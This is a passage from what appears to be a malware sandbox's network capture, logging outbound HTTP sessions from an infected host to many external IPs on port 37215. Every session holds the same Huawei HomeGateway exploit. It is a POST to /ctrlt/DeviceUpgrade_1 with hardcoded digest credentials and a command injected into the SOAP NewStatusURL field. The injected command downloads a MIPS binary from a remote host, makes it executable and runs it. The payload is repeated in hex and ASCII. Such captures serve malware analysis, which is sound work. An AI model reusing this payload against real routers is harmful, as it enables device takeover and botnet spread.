                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            193192.168.2.134158441.169.217.18237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.030617952 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            194192.168.2.1352142197.94.187.6337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.031358957 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            195192.168.2.1351814197.105.195.5637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.032058001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            196192.168.2.1342506197.235.137.22037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.032756090 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            197192.168.2.1336414156.115.29.337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.033458948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            198192.168.2.133634841.222.149.19637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.034176111 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            199192.168.2.1334742156.230.39.6237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.034889936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            200192.168.2.1341890197.253.99.10037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.035608053 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            201192.168.2.1350702156.238.163.11037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.036323071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            202192.168.2.1333786156.179.78.18137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.037044048 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 